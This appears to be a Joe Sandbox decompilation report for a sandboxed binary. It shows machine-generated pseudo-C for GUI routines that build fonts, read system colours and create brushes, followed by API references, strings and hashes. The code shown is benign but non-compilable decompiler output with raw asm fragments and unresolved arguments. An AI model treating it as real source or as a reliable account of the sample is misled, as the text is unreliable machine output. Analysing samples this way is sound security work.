				struct HPEN__* _t386;
				signed int _t425;
				signed int _t426;
				int _t433;
				struct HFONT__* _t443;
				int _t446;
				signed int _t447;
				CHAR* _t448;
				void* _t473;
				signed int _t474;
				signed int _t476;
				signed int _t492;
				signed int _t493;
				void* _t500;
				void* _t506;
				signed int _t552;
				void* _t554;
				intOrPtr* _t556;
				signed int _t557;
				signed int _t563;
				void* _t585;
				signed long long _t619;
				long _t624;

				_t585 = __eflags;
				_t552 = __edx;
				_t472 = __ebx;
				E00DDD55F(0xe0a4f2, __ebx, __edi, __esi);
				_t560 = __ecx;
				E00CB90E5(__ebx,  &_v800, __edx, __edi, __ecx, _t585, 0, 0x314);
				_v4 = _v4 & 0x00000000;
				_t244 = GetDeviceCaps(_v792, 0x58);
				_v768 = _t244;
				asm("fild dword [ebp-0x300]");
				_v768 = __fp0;
				_t619 = _v768 /  *0xe1f250;
				asm("fst qword [esi+0x1e0]");
				asm("fld1");
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t244 & 0x00000005) != 0) {
					st1 = _t619;
					L4:
					st0 = _t619;
				} else {
					_t619 =  *0xe1f240;
					asm("fcomp st0, st2");
					asm("fnstsw ax");
					st1 = _t619;
					if((_t244 & 0x00000041) != 0) {
						goto L4;
					} else {
						 *(__ecx + 0x1e0) = _t619;
					}
				}
				_t554 = _t560 + 0x11c;
				if(_t554 != 0 &&  *((intOrPtr*)(_t554 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t554));
				}
				_t245 = _t560 + 0x124;
				if(_t245 != 0 &&  *((intOrPtr*)(_t245 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t245));
				}
				_t246 = _t560 + 0x12c;
				if(_t246 != 0 &&  *((intOrPtr*)(_t246 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t246));
				}
				_t247 = _t560 + 0x134;
				if(_t247 != 0 &&  *((intOrPtr*)(_t247 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t247));
				}
				_t248 = _t560 + 0x13c;
				if(_t248 != 0 &&  *((intOrPtr*)(_t248 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t248));
				}
				_t249 = _t560 + 0x144;
				if(_t249 != 0 &&  *((intOrPtr*)(_t249 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t249));
				}
				_t250 = _t560 + 0x14c;
				if(_t250 != 0 &&  *((intOrPtr*)(_t250 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t250));
				}
				_t251 = _t560 + 0x154;
				if(_t251 != 0 &&  *((intOrPtr*)(_t251 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t251));
				}
				_t252 = _t560 + 0x164;
				if(_t252 != 0 &&  *((intOrPtr*)(_t252 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t472, _t252));
				}
				_t473 = _t560 + 0x15c;
				if(_t473 != 0 &&  *((intOrPtr*)(_t473 + 4)) != 0) {
					DeleteObject(E00CB9D20(_t473, _t473));
				}
				_v420 = 0x158;
				E00CD8E35(_t560,  &_v420); // executed
				E00DDFBE0(_t554,  &_v76, 0, 0x3c);
				_v76.lfCharSet = GetTextCharsetInfo(_v796, 0, 0);
				_v76.lfWeight = _v244;
				_v76.lfItalic = _v240;
				asm("cdq");
				_t262 = (_v260 ^ _t552) - _t552;
				if(_t262 > 0xc) {
					__eflags =  *(_t560 + 8);
					if( *(_t560 + 8) == 0) {
						_t262 = _t262 - 1;
						__eflags = _t262;
					}
				} else {
					_t262 = 0xb;
				}
				if(_v260 < 0) {
					_t262 =  ~_t262;
				}
				_v76.lfHeight = _t262;
				lstrcpyA( &(_v76.lfFaceName),  &_v232);
				if( *((intOrPtr*)(_t560 + 4)) == 0 && _v237 <= 2) {
					_t446 = EnumFontFamiliesA(_v796, 0, E00CD8CD7, "Segoe UI"); // executed
					if(_t446 != 0) {
						_t447 = EnumFontFamiliesA(_v796, 0, E00CD8CD7, "Tahoma");
						__eflags = _t447;
						_t448 =  &(_v76.lfFaceName);
						if(_t447 != 0) {
							_push("MS Sans Serif");
						} else {
							_push("Tahoma");
						}
						lstrcpyA(_t448, ??);
					} else {
						lstrcpyA( &(_v76.lfFaceName), "Segoe UI");
						_v76.lfQuality = 5;
					}
				}
				E00CB9BC6(_t473, _t554, _t554, CreateFontIndirectA( &_v76));
				_t555 = _v76.lfHeight;
				_v768 = E00DEC8A6(_t552, _t555);
				asm("fild dword [ebp-0x300]");
				_v772 = _t619;
				asm("fld1");
				asm("faddp st1, st0");
				_t270 = L00DDD790(_t552);
				_v76.lfHeight = _t270;
				if(_t555 < 0) {
					_v76.lfHeight =  ~_t270;
				}
				E00CB9BC6(_t473, _t473, _t555, CreateFontIndirectA( &_v76));
				_v76.lfHeight = _t555;
				_v764 = 0x158;
				E00CD8E35(_t560,  &_v764);
				_v76.lfItalic = _v524;
				_v76.lfWeight = _v528;
				E00CB9BC6(_t473, _t560 + 0x124, _t555, CreateFontIndirectA( &_v76));
				_v76.lfItalic = _v240;
				_v76.lfWeight = _v244;
				_v76.lfUnderline = 1;
				E00CB9BC6(_t473, _t560 + 0x13c, _t555, CreateFontIndirectA( &_v76));
				_v76.lfUnderline = 0;
				_v76.lfWeight = 0x2bc;
				E00CB9BC6(_t473, _t560 + 0x12c, _t555, CreateFontIndirectA( &_v76));
				_t474 = _v76.lfCharSet;
				_v76.lfWeight = _v76.lfWeight & 0x00000000;
				_v76.lfCharSet = 2;
				_v76.lfHeight = GetSystemMetrics(0x48) - 1;
				lstrcpyA( &(_v76.lfFaceName), "Marlett");
				_t294 = CreateFontIndirectA( &_v76);
				_t488 = _t560 + 0x164;
				E00CB9BC6(_t474, _t560 + 0x164, _t555, _t294);
				_v776 = _v776 & 0x00000000;
				_v76.lfCharSet = _t474;
				_v780 = 0xe19a40;
				_v4 = 1;
				_t296 = GetStockObject(0x11);
				_v776 = _t296;
				if(_t296 != 0) {
					_t488 =  &_v76;
					_t433 = GetObjectA(_t296, 0x3c,  &_v76);
					_t615 = _t433;
					if(_t433 != 0) {
						_t555 = 0x384;
						_v76.lfHeight = _v260;
						_v76.lfWeight = _v244;
						_v76.lfItalic = _v240;
						_v76.lfOrientation = 0x384;
						_v76.lfEscapement = 0xa8c;
						lstrcpyA( &(_v76.lfFaceName), "Arial");
						E00CB9BC6(_t474, _t560 + 0x14c, 0x384, CreateFontIndirectA( &_v76));
						_v76.lfEscapement = 0x384;
						_t443 = CreateFontIndirectA( &_v76);
						_t488 = _t560 + 0x154;
						E00CB9BC6(_t474, _t560 + 0x154, 0x384, _t443);
					}
				}
				GetObjectA( *(E00CB9E25(_t474, _t488, _t552, _t555, _t560, _t615, GetStockObject(0x11)) + 4), 0x3c,  &_v76);
				_v76.lfUnderline = 1;
				E00CB9BC6(_t474, _t560 + 0x144, _t555, CreateFontIndirectA( &_v76));
				_v76.lfUnderline = 0;
				_v76.lfWeight = 0x2bc;
				E00CB9BC6(_t474, _t560 + 0x134, _t555, CreateFontIndirectA( &_v76));
				_t492 = _t560;
				L84();
				_t556 =  *0xe873cc; // 0x0
				while(_t556 != 0) {
					_t474 =  *(_t556 + 8);
					_t556 =  *_t556;
					__eflags = _t474;
					if(__eflags == 0) {
						E00CAA4E7(_t474, _t492, _t556, _t560, __eflags);
						asm("int3");
						_push(0x20);
						E00DDD52C(0xe0a531, _t474, _t556, _t560);
						_t557 = _t492;
						_t309 = GetSysColor(0x16);
						__eflags = _t309 - 0xffffff;
						if(_t309 != 0xffffff) {
							L64:
							_t310 = 0;
						} else {
							_t425 = GetSysColor(0xf);
							__eflags = _t425;
							if(_t425 != 0) {
								goto L64;
							} else {
								_t310 = _t425 + 1;
							}
						}
						 *(_t557 + 0x184) = _t310;
						__eflags = GetSysColor(0x15);
						if(__eflags != 0) {
							L68:
							_t312 = 0;
						} else {
							__eflags = GetSysColor(0xf) - 0xffffff;
							if(__eflags != 0) {
								goto L68;
							} else {
								_t312 = 1;
							}
						}
						_push(0);
						_t493 =  &_v44;
						 *((intOrPtr*)(_t557 + 0x188)) = _t312;
						E00CB90E5(0, _t493, _t552, _t557, 0xffffff, __eflags);
						_v4 = 0;
						 *((intOrPtr*)(_t557 + 0x1ac)) = GetDeviceCaps(_v36, 0xc);
						_t315 = GetSysColor(0xf);
						 *(_t557 + 0x1c) = _t315;
						 *(_t557 + 0x54) = _t315;
						_t316 = GetSysColor(0x10);
						 *(_t557 + 0x20) = _t316;
						 *(_t557 + 0x58) = _t316;
						_t317 = GetSysColor(0x15);
						 *(_t557 + 0x30) = _t317;
						 *(_t557 + 0x60) = _t317;
						_t318 = GetSysColor(0x16);
						 *(_t557 + 0x34) = _t318;
						 *(_t557 + 0x64) = _t318;
						_t319 = GetSysColor(0x14);
						 *(_t557 + 0x24) = _t319;
						 *(_t557 + 0x5c) = _t319;
						_t320 = GetSysColor(0x12);
						 *(_t557 + 0x28) = _t320;
						 *(_t557 + 0x68) = _t320;
						 *((intOrPtr*)(_t557 + 0x38)) = GetSysColor(0x11);
						 *((intOrPtr*)(_t557 + 0x2c)) = GetSysColor(6);
						 *(_t557 + 0x3c) = GetSysColor(0xd);
						 *((intOrPtr*)(_t557 + 0x40)) = GetSysColor(0xe);
						_t325 = GetSysColor(5);
						 *(_t557 + 0x6c) = _t325;
						 *(_t557 + 0x50) = _t325;
						 *(_t557 + 0x70) = GetSysColor(8);
						 *((intOrPtr*)(_t557 + 0x74)) = GetSysColor(9);
						 *((intOrPtr*)(_t557 + 0x78)) = GetSysColor(7);
						 *(_t557 + 0x7c) = GetSysColor(2);
						 *(_t557 + 0x80) = GetSysColor(3);
						 *((intOrPtr*)(_t557 + 0x88)) = GetSysColor(0x1b);
						 *((intOrPtr*)(_t557 + 0x8c)) = GetSysColor(0x1c);
						 *((intOrPtr*)(_t557 + 0x90)) = GetSysColor(0xa);
						 *((intOrPtr*)(_t557 + 0x94)) = GetSysColor(0xb);
						_t335 = GetSysColor(0x13);
						__eflags =  *(_t557 + 0x184);
						 *(_t557 + 0x84) = _t335;
						if( *(_t557 + 0x184) == 0) {
							_t562 = 0x800080;
							_t476 = 0xff0000;
							_t336 = GetSysColor(0x1a);
						} else {
							_t562 =  *(_t557 + 0x70);
							_t476 = _t562;
							_t336 = _t562;
						}
						 *(_t557 + 0x44) = _t336;
						 *(_t557 + 0x48) = _t476;
						 *(_t557 + 0x4c) = _t562;
						_t337 = GetSysColorBrush(0x10);
						 *(_t557 + 0x14) = _t337;
						__eflags = _t337;
						if(__eflags == 0) {
							L83:
							E00CAA4E7(_t476, _t493, _t557, _t562, __eflags);
							asm("int3");
							E00DDD55F(0xe0a55b, _t476, _t557, _t562);
							_t563 = _t493;
							E00CB90E5(_t476,  &_v92, _t552, _t557, _t563, __eflags, 0, 0x50);
							_v4 = _v4 & 0x00000000;
							_t343 = E00CBA2B8( &_v92, _t563 + 0x11c);
							_t558 = _t343;
							__eflags = _t343;
							if(__eflags == 0) {
								_t344 = E00CAA4E7(_t476,  &_v92, _t558, _t563, __eflags);
								asm("int3");
								_t624 = _v76.lfHeight;
								asm("fcom st0, st1");
								asm("fnstsw ax");
								st1 = _t624;
								__eflags = _t344 & 0x00000041;
								if((_t344 & 0x00000041) != 0) {
									st0 = _t624;
									goto L90;
								} else {
									asm("fcomp qword [0xe19bf8]");
									asm("fnstsw ax");
									__eflags = _t344 & 0x00000041;
									if((_t344 & 0x00000041) != 0) {
										L90:
										asm("fldz");
										return _t344;
									} else {
										asm("fld1");
										return _t344;
									}
								}
							} else {
								GetTextMetricsA(_v84,  &(_v76.lfWidth));
								_t347 = _v76.lfWidth.tmHeight;
								__eflags = _t347 - 0xf;
								_t500 = ((0 | _t347 - 0x0000000f >= 0x00000000) - 0x00000001 & 0xfffffffd) + 5;
								 *((intOrPtr*)(_t563 + 0x1cc)) = _t347 + _t500;
								 *((intOrPtr*)(_t563 + 0x1d4)) = _v76.lfFaceName + _t500;
								E00CBA2B8( &_v92, _t563 + 0x14c);
								GetTextMetricsA(_v84,  &(_v76.lfWidth));
								_t355 = _v76.lfWidth.tmHeight;
								__eflags = _t355 - 0xf;
								_t506 = ((0 | _t355 - 0x0000000f >= 0x00000000) - 0x00000001 & 0xfffffffd) + 5;
								 *((intOrPtr*)(_t563 + 0x1d0)) = _t355 + _t506;
								_t358 = _v76.lfFaceName + _t506;
								__eflags = _t358;
								 *(_t563 + 0x1d8) = _t358;
								E00CBA2B8( &_v92, _t558);
								E00CB9360( &_v92);
								return E00DDD50E(_t476, _t558, _t563);
							}
						} else {
							_t362 = GetSysColorBrush(0x14);
							 *(_t557 + 0x10) = _t362;
							__eflags = _t362;
							if(__eflags == 0) {
								goto L83;
							} else {
								_t363 = GetSysColorBrush(5);
								 *(_t557 + 0x18) = _t363;
								__eflags = _t363;
								if(__eflags == 0) {
									goto L83;
								} else {
									E00CB9CCD(_t557 + 0x98);
									_t365 = CreateSolidBrush( *(_t557 + 0x1c)); // executed
									E00CB9BC6(_t476, _t557 + 0x98, _t557, _t365);
									E00CB9CCD(_t557 + 0xd0);
									E00CB9BC6(_t476, _t557 + 0xd0, _t557, CreateSolidBrush( *(_t557 + 0x54)));
									E00CB9CCD(_t557 + 0xb8);
									E00CB9BC6(_t476, _t557 + 0xb8, _t557, CreateSolidBrush( *(_t557 + 0x7c)));
									E00CB9CCD(_t557 + 0xc0);
									E00CB9BC6(_t476, _t557 + 0xc0, _t557, CreateSolidBrush( *(_t557 + 0x80)));
									E00CB9CCD(_t557 + 0xa0);
									E00CB9BC6(_t476, _t557 + 0xa0, _t557, CreateSolidBrush( *(_t557 + 0x3c)));
									E00CB9CCD(_t557 + 0xb0);
									E00CB9BC6(_t476, _t557 + 0xb0, _t557, CreateSolidBrush( *(_t557 + 0x30)));
									E00CB9CCD(_t557 + 0xc8);
									E00CB9BC6(_t476, _t557 + 0xc8, _t557, CreateSolidBrush( *(_t557 + 0x6c)));
									E00CB9CCD(_t557 + 0xd8);
									_t386 = CreatePen(0, 1,  *0xe8711c); // executed
									E00CB9BC6(0, _t557 + 0xd8, _t557, _t386);
									E00CB9CCD(_t557 + 0xe0);
									E00CB9BC6(0, _t557 + 0xe0, _t557, CreatePen(0, 1,  *0xe87134));
									_t562 = _t557 + 0xe8;
									E00CB9CCD(_t557 + 0xe8);
									E00CB9BC6(0, _t557 + 0xe8, _t557, CreatePen(0, 1,  *0xe87138));
									_t476 = _t557 + 0xa8;
									__eflags = _t476;
									if(_t476 != 0) {
										__eflags =  *(_t476 + 4);
										if( *(_t476 + 4) != 0) {
											E00CB9CCD(_t476);
										}
									}
									__eflags =  *((intOrPtr*)(_t557 + 0x1ac)) - 8;
									if( *((intOrPtr*)(_t557 + 0x1ac)) <= 8) {
										_t493 = _t557;
										__eflags = E00CD89BC(_v40);
										if(__eflags == 0) {
											goto L83;
										} else {
											_t202 =  &_v20;
											 *_t202 = _v20 & 0x00000000;
											__eflags =  *_t202;
											_v24 = 0xe196b4;
											_v4 = 1;
											E00CB9BC6(_t476,  &_v24, _t557, _t394);
											E00CB9BC6(_t476, _t476, _t557, CreatePatternBrush(_v20));
											_v4 = 0;
											_v24 = 0xe196b4;
											E00CB91F0( &_v24, _t552);
											goto L82;
										}
									} else {
										_v13 =  *(_t557 + 0x1c);
										asm("cdq");
										asm("cdq");
										asm("cdq");
										E00CB9BC6(_t476, _t557 + 0xa8, _t557, CreateSolidBrush((((( *(_t557 + 0x26) & 0x000000ff) - ( *(_t557 + 0x1e) & 0x000000ff) - _t552 >> 0x00000001) +  *(_t557 + 0x1e) & 0x000000ff) << 0x00000008 | (( *(_t557 + 0x25) & 0x000000ff) - ( *(_t557 + 0x1d) & 0x000000ff) - _t552 >> 0x00000001) +  *(_t557 + 0x1d) & 0x000000ff) << 0x00000008 | (( *(_t557 + 0x24) & 0x000000ff) - (_v13 & 0x000000ff) - _t552 >> 0x00000001) + _v13 & 0x000000ff));
										L82:
										E00D09DA8();
										 *0xe8871c = 1;
										return E00DDD4FA(E00CB9360( &_v44));
									}
								}
							}
						}
					} else {
						_t426 = E00CB27A9(_t492, _t556, __eflags,  *((intOrPtr*)(_t474 + 0x20)));
						__eflags = _t426;
						if(_t426 != 0) {
							_t560 =  *( *_t474 + 0x3a8);
							 *0xe17a64();
							_t492 = _t474;
							 *( *( *_t474 + 0x3a8))();
						}
						continue;
					}
					L91:
				}
				_v780 = 0xe19a40;
				E00CB91F0( &_v780, _t552); // executed
				E00CB9360( &_v800);
				return E00DDD50E(_t474, _t556, _t560);
				goto L91;
			}

0x00cd91a9
0x00cd91a9
0x00cd91a9
0x00cd91b3
0x00cd91b8
0x00cd91c2
0x00cd91c7
0x00cd91d3
0x00cd91d9
0x00cd91df
0x00cd91e5
0x00cd91f1
0x00cd91f7
0x00cd91fd
0x00cd91ff
0x00cd9201
0x00cd9206
0x00cd9221
0x00cd9223
0x00cd9223
0x00cd9208
0x00cd9208
0x00cd920e
0x00cd9210
0x00cd9212
0x00cd9217
0x00000000
0x00cd9219
0x00cd9219
0x00cd9219
0x00cd9217
0x00cd9225
0x00cd922d
0x00cd923d
0x00cd923d
0x00cd9243
0x00cd924b
0x00cd925b
0x00cd925b
0x00cd9261
0x00cd9269
0x00cd9279
0x00cd9279
0x00cd927f
0x00cd9287
0x00cd9297
0x00cd9297
0x00cd929d
0x00cd92a5
0x00cd92b5
0x00cd92b5
0x00cd92bb
0x00cd92c3
0x00cd92d3
0x00cd92d3
0x00cd92d9
0x00cd92e1
0x00cd92f1
0x00cd92f1
0x00cd92f7
0x00cd92ff
0x00cd930f
0x00cd930f
0x00cd9315
0x00cd931d
0x00cd932d
0x00cd932d
0x00cd9333
0x00cd933b
0x00cd934b
0x00cd934b
0x00cd9357
0x00cd9364
0x00cd9371
0x00cd9389
0x00cd9392
0x00cd939b
0x00cd93a4
0x00cd93a7
0x00cd93ac
0x00cd93b3
0x00cd93b7
0x00cd93b9
0x00cd93b9
0x00cd93b9
0x00cd93ae
0x00cd93b0
0x00cd93b0
0x00cd93c1
0x00cd93c3
0x00cd93c3
0x00cd93c5
0x00cd93d3
0x00cd93dd
0x00cd93fa
0x00cd9402
0x00cd942b
0x00cd9431
0x00cd9433
0x00cd9436
0x00cd943f
0x00cd9438
0x00cd9438
0x00cd9438
0x00cd9445
0x00cd9404
0x00cd940d
0x00cd9413
0x00cd9413
0x00cd9402
0x00cd9458
0x00cd945d
0x00cd9466
0x00cd946c
0x00cd9473
0x00cd947f
0x00cd9481
0x00cd948b
0x00cd9490
0x00cd9495
0x00cd9499
0x00cd9499
0x00cd94a9
0x00cd94b4
0x00cd94ba
0x00cd94c4
0x00cd94cf
0x00cd94d8
0x00cd94ec
0x00cd94f7
0x00cd9500
0x00cd9507
0x00cd9518
0x00cd9520
0x00cd9525
0x00cd9539
0x00cd953e
0x00cd9541
0x00cd9547
0x00cd9552
0x00cd955e
0x00cd9568
0x00cd956f
0x00cd9575
0x00cd957a
0x00cd9581
0x00cd9584
0x00cd9590
0x00cd9594
0x00cd959a
0x00cd95a2
0x00cd95a4
0x00cd95ab
0x00cd95b1
0x00cd95b3
0x00cd95bb
0x00cd95c0
0x00cd95c9
0x00cd95d2
0x00cd95de
0x00cd95e1
0x00cd95e8
0x00cd95ff
0x00cd9607
0x00cd960b
0x00cd9612
0x00cd9618
0x00cd9618
0x00cd95b3
0x00cd9634
0x00cd963d
0x00cd964f
0x00cd9657
0x00cd965c
0x00cd9670
0x00cd9675
0x00cd9677
0x00cd967c
0x00cd96ad
0x00cd9684
0x00cd9687
0x00cd9689
0x00cd968b
0x00cd96d7
0x00cd96dc
0x00cd96dd
0x00cd96e4
0x00cd96e9
0x00cd96ed
0x00cd96fa
0x00cd96fc
0x00cd970d
0x00cd970d
0x00cd96fe
0x00cd9700
0x00cd9706
0x00cd9708
0x00000000
0x00cd970a
0x00cd970a
0x00cd970a
0x00cd9708
0x00cd9711
0x00cd971d
0x00cd971f
0x00cd9732
0x00cd9732
0x00cd9721
0x00cd9729
0x00cd972b
0x00000000
0x00cd972d
0x00cd972f
0x00cd972f
0x00cd972b
0x00cd9734
0x00cd9735
0x00cd9738
0x00cd973e
0x00cd9748
0x00cd9753
0x00cd9759
0x00cd9761
0x00cd9764
0x00cd9767
0x00cd976f
0x00cd9772
0x00cd9775
0x00cd977d
0x00cd9780
0x00cd9783
0x00cd978b
0x00cd978e
0x00cd9791
0x00cd9799
0x00cd979c
0x00cd979f
0x00cd97a7
0x00cd97aa
0x00cd97b5
0x00cd97c0
0x00cd97cb
0x00cd97d6
0x00cd97d9
0x00cd97e1
0x00cd97e4
0x00cd97ef
0x00cd97fa
0x00cd9805
0x00cd9810
0x00cd981b
0x00cd9829
0x00cd9837
0x00cd9845
0x00cd9853
0x00cd9859
0x00cd985f
0x00cd9865
0x00cd986b
0x00cd9878
0x00cd987d
0x00cd9882
0x00cd986d
0x00cd986d
0x00cd9870
0x00cd9872
0x00cd9872
0x00cd9888
0x00cd988b
0x00cd9890
0x00cd9893
0x00cd9899
0x00cd989c
0x00cd989e
0x00cd9af5
0x00cd9af5
0x00cd9afa
0x00cd9b02
0x00cd9b07
0x00cd9b0e
0x00cd9b13
0x00cd9b21
0x00cd9b26
0x00cd9b28
0x00cd9b2a
0x00cd9bba
0x00cd9bbf
0x00cd9bc9
0x00cd9bcc
0x00cd9bce
0x00cd9bd0
0x00cd9bd2
0x00cd9bd5
0x00cd9be8
0x00000000
0x00cd9bd7
0x00cd9bd7
0x00cd9bdd
0x00cd9bdf
0x00cd9be2
0x00cd9bea
0x00cd9bea
0x00cd9bed
0x00cd9be4
0x00cd9be4
0x00cd9be7
0x00cd9be7
0x00cd9be2
0x00cd9b30
0x00cd9b37
0x00cd9b3d
0x00cd9b42
0x00cd9b4c
0x00cd9b51
0x00cd9b5f
0x00cd9b6c
0x00cd9b78
0x00cd9b7e
0x00cd9b83
0x00cd9b8e
0x00cd9b93
0x00cd9b9c
0x00cd9b9c
0x00cd9ba1
0x00cd9ba7
0x00cd9baf
0x00cd9bb9
0x00cd9bb9
0x00cd98a4
0x00cd98a6
0x00cd98ac
0x00cd98af
0x00cd98b1
0x00000000
0x00cd98b7
0x00cd98b9
0x00cd98bf
0x00cd98c2
0x00cd98c4
0x00000000
0x00cd98ca
0x00cd98d2
0x00cd98da
0x00cd98e3
0x00cd98f0
0x00cd9901
0x00cd990e
0x00cd991f
0x00cd992c
0x00cd9940
0x00cd994d
0x00cd995e
0x00cd996b
0x00cd997c
0x00cd9989
0x00cd999a
0x00cd99a7
0x00cd99b7
0x00cd99c0
0x00cd99cd
0x00cd99e4
0x00cd99e9
0x00cd99f1
0x00cd9a08
0x00cd9a0d
0x00cd9a13
0x00cd9a15
0x00cd9a17
0x00cd9a1b
0x00cd9a1f
0x00cd9a1f
0x00cd9a1b
0x00cd9a24
0x00cd9a2b
0x00cd9a94
0x00cd9a9b
0x00cd9a9d
0x00000000
0x00cd9a9f
0x00cd9a9f
0x00cd9a9f
0x00cd9a9f
0x00cd9aa8
0x00cd9aaf
0x00cd9ab3
0x00cd9ac4
0x00cd9acc
0x00cd9ad0
0x00cd9ad3
0x00000000
0x00cd9ad3
0x00cd9a2d
0x00cd9a34
0x00cd9a41
0x00cd9a59
0x00cd9a6f
0x00cd9a8a
0x00cd9ad8
0x00cd9ad8
0x00cd9ae0
0x00cd9af4
0x00cd9af4
0x00cd9a2b
0x00cd98c4
0x00cd98b1
0x00cd968d
0x00cd9690
0x00cd9695
0x00cd9697
0x00cd969b
0x00cd96a3
0x00cd96a9
0x00cd96ab
0x00cd96ab
0x00000000
0x00cd9697
0x00000000
0x00cd968b
0x00cd96b7
0x00cd96c1
0x00cd96cc
0x00cd96d6
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD91B3

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

GetDeviceCaps.GDI32(?,00000058), ref: 00CD91D3
DeleteObject.GDI32(00000000), ref: 00CD923D
DeleteObject.GDI32(00000000), ref: 00CD925B
DeleteObject.GDI32(00000000), ref: 00CD9279
DeleteObject.GDI32(00000000), ref: 00CD9297
DeleteObject.GDI32(00000000), ref: 00CD92B5
DeleteObject.GDI32(00000000), ref: 00CD92D3
DeleteObject.GDI32(00000000), ref: 00CD92F1
DeleteObject.GDI32(00000000), ref: 00CD930F
DeleteObject.GDI32(00000000), ref: 00CD932D
DeleteObject.GDI32(00000000), ref: 00CD934B
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00CD9383
lstrcpyA.KERNEL32(?,?), ref: 00CD93D3
EnumFontFamiliesA.GDI32(?,00000000,00CD8CD7,Segoe UI), ref: 00CD93FA
lstrcpyA.KERNEL32(?,Segoe UI), ref: 00CD940D
EnumFontFamiliesA.GDI32(?,00000000,00CD8CD7,Tahoma), ref: 00CD942B
lstrcpyA.KERNEL32(?,MS Sans Serif), ref: 00CD9445
CreateFontIndirectA.GDI32(?), ref: 00CD944F
CreateFontIndirectA.GDI32(?), ref: 00CD94A0
CreateFontIndirectA.GDI32(?), ref: 00CD94DF
CreateFontIndirectA.GDI32(?), ref: 00CD950B
CreateFontIndirectA.GDI32(?), ref: 00CD952C
GetSystemMetrics.USER32 ref: 00CD954B
lstrcpyA.KERNEL32(?,Marlett), ref: 00CD955E
CreateFontIndirectA.GDI32(?), ref: 00CD9568
GetStockObject.GDI32(00000011), ref: 00CD9594
GetObjectA.GDI32(00000000,0000003C,?), ref: 00CD95AB
lstrcpyA.KERNEL32(?,Arial,?,?,00000000), ref: 00CD95E8
CreateFontIndirectA.GDI32(?), ref: 00CD95F2
CreateFontIndirectA.GDI32(?), ref: 00CD960B
GetStockObject.GDI32(00000011), ref: 00CD961F
GetObjectA.GDI32(?,0000003C,?), ref: 00CD9634
CreateFontIndirectA.GDI32(?), ref: 00CD9642
CreateFontIndirectA.GDI32(?), ref: 00CD9663

Part of subcall function 00CD9AFB: __EH_prolog3_GS.LIBCMT ref: 00CD9B02
Part of subcall function 00CD9AFB: GetTextMetricsA.GDI32(?,?), ref: 00CD9B37
Part of subcall function 00CD9AFB: GetTextMetricsA.GDI32(?,?), ref: 00CD9B78

Strings

Marlett, xrefs: 00CD9558
Tahoma, xrefs: 00CD9419, 00CD9438
MS Sans Serif, xrefs: 00CD943F
Arial, xrefs: 00CD95D8
Segoe UI, xrefs: 00CD93E8, 00CD9404

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CapsCharsetDeviceH_prolog3InfoSystemWindow
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 3506729969-1395034203
Opcode ID: 585fea01c6eb62a8048a0198d922e264db821f1722a7e4c28cad61d71adbb0f2
Instruction ID: 22154393dcfcc23dacc3e0cf2c7de94630f7b0679f9e0278aa27725dff91cc31
Opcode Fuzzy Hash: 585fea01c6eb62a8048a0198d922e264db821f1722a7e4c28cad61d71adbb0f2
Instruction Fuzzy Hash: 54E16074A00209EFDB219FA1DD49BDE7BB8EF04701F00849AF65AB3291DB749A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CD96DD Relevance: 64.8, APIs: 43, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00CD96DD(void* __ebx, char* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				signed int _v13;
				struct tagTEXTMETRICA _v72;
				struct HDC__* _v84;
				char _v92;
				int _t118;
				int _t120;
				long _t123;
				long _t124;
				long _t125;
				long _t126;
				long _t127;
				long _t128;
				long _t133;
				long _t144;
				struct HBRUSH__* _t145;
				signed int _t151;
				signed char _t152;
				long _t155;
				long _t163;
				signed int _t166;
				struct HBRUSH__* _t170;
				struct HBRUSH__* _t171;
				struct HBRUSH__* _t173;
				struct HPEN__* _t194;
				long _t231;
				long _t233;
				long _t236;
				char* _t239;
				void* _t246;
				void* _t252;
				void* _t284;
				char* _t286;
				char* _t291;
				signed int _t325;

				_t284 = __edx;
				_push(0x20);
				E00DDD52C(0xe0a531, __ebx, __edi, __esi);
				_t286 = __ecx;
				if(GetSysColor(0x16) != 0xffffff) {
					L3:
					_t118 = 0;
				} else {
					_t233 = GetSysColor(0xf);
					if(_t233 != 0) {
						goto L3;
					} else {
						_t118 = _t233 + 1;
					}
				}
				 *((intOrPtr*)(_t286 + 0x184)) = _t118;
				if(GetSysColor(0x15) != 0) {
					L7:
					_t120 = 0;
				} else {
					_t231 = GetSysColor(0xf);
					_t316 = _t231 - 0xffffff;
					if(_t231 != 0xffffff) {
						goto L7;
					} else {
						_t120 = 1;
					}
				}
				_push(0);
				_t239 =  &(_v72.tmWeight);
